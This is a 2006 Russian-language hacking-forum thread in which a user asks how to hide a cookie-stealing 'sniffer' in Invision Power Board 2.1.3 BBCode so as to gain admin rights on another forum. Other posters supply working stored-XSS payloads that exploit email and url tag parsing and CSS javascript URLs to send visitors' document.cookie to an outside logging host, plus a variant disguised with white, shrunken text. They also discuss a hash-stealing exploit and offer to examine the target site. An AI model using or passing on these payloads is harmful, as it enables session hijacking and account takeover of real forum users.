Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Как спрятать сниффер под Opera в Ipb 2.1.3 |
06.01.2006, 23:48
|
|
Новичок
Регистрация: 03.01.2006
Сообщений: 17
Провел на форуме:
38341
Репутация:
0
|
|
Как спрятать сниффер под Opera в Ipb 2.1.3
Есть форум Invision Power Board v2.1.3
Проблема - достать права Админа.. =(
Главная проблема в том, что ВСЕ! коды видно в Опере...
Я долго думал, пробовал разные комбинацыи и нашел код, который нигде (ни в Опере, ни в ИЕ) не видно, НО, он не работает как снифер...
Вот сам коД:
[COLO*R=[IM*G]http://aaa.aa/=`aaa.jpg[/I*MG]` style=background:url(javascript:document.images[1] .src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)] [/COL*OR]
Кто скажет, в чем проблема ? Почему код не работает?...
Заранее спасибо.
|
|
|
06.01.2006, 23:58
|
|
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706
Репутация:
1419
|
|
Есть форум Invision Power Board v2.1.3
Проблема - достать права Админа.. =(
Главная проблема в том, что ВСЕ! коды видно в Опере...
Я долго думал, пробовал разные комбинацыи и нашел код, который нигде (ни в Опере, ни в ИЕ) не видно, НО, он не работает как снифер...
Вот сам коД:
[COLO*R=[IM*G]http://aaa.aa/=`aaa.jpg[/I*MG]` style=background:url(javascript:document.images[1] .src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)] [/COL*OR]
Кто скажет, в чем проблема ? Почему код не работает?...
Заранее спасибо.
А ещё варианты есть какие нить??? Попробуй сплойтом.
И ещё, дай ссылку на сайт, я посмотрю.
|
|
|
|
07.01.2006, 00:01
|
|
Новичок
Регистрация: 03.01.2006
Сообщений: 17
Провел на форуме:
38341
Репутация:
0
|
|
Просто сплойт почему-то не работает =( Пробовал на 8 форумах ИПБ, нигде не находил хэши...
Может проблема в сплойте... я это $allchar .= chr($char); исправил, но он все-равно не работает... провил и на $allchar .= chr($i);
А в КОДе выше в чем может быть проблема ?
Вот сайт :
http://www.ссылки в личку!.com/forum/index.php?
Последний раз редактировалось Azazel; 07.01.2006 в 00:47..
|
|
|
|
07.01.2006, 00:04
|
|
Новичок
Регистрация: 03.01.2006
Сообщений: 17
Провел на форуме:
38341
Репутация:
0
|
|
Кстати, может быть проблема в этом ??
Что я после src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) ---> ; не поставил ?
Типа так : src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);
???
|
|
|
|
07.01.2006, 00:12
|
|
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706
Репутация:
1419
|
|
Найдена XSS
alert
Код:
[e*mail]wj@wj[u*rl=http://www.wj.com`=`][/u*rl].com[/e*mail] ` style=`background:url(javaSCrip t:alert(/wj/))`
cookie
Код:
[em*ail]wj@wj[u*rl=http://www.wj.com`=`][/ur*l].com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
Звёздочки поубирай в тэгах.
Последний раз редактировалось •••™NO FEAR™•••; 07.01.2006 в 00:22..
|
|
|
|
07.01.2006, 00:23
|
|
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706
Репутация:
1419
|
|
Я только что проверял, всё работает... Барсик, ты чего.... Вот только что проверял!
Неее... Сплойтом не пробывал, так быстренько, на скорую руку посмотрел, XSS есть, читай статью WJ...
Она поможет...
Незабываем про репутацию!  |
|
|
|
07.01.2006, 00:24
|
|
Новичок
Регистрация: 03.01.2006
Сообщений: 17
Провел на форуме:
38341
Репутация:
0
|
|
Блин, в Опере всеравно коды отображаются =(
А реально что-то сделать в том коде, что-бы и в Опере его небыло видно ?
Последний раз редактировалось Kragen; 07.01.2006 в 00:30..
|
|
|
|
07.01.2006, 00:36
|
|
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790
Репутация:
726
|
|
Последний раз редактировалось Barsik; 07.01.2006 в 00:39..
|
|
|
|
07.01.2006, 06:29
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
Ошибочка у тебя на скрине по мойму
Попробуй так:
PHP код:
[color=#FFF][size=-7][email]wj@wj[url=http://www.wj.com`=`][/url].com[/email]`style=`background:url(javaSCript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/size][/color]
Последний раз редактировалось Otaku; 07.01.2006 в 06:33..
|
|
|
|
07.01.2006, 14:57
|
|
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790
Репутация:
726
|
|
Нет даже так не работает. Ну ладно ничего страшного  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
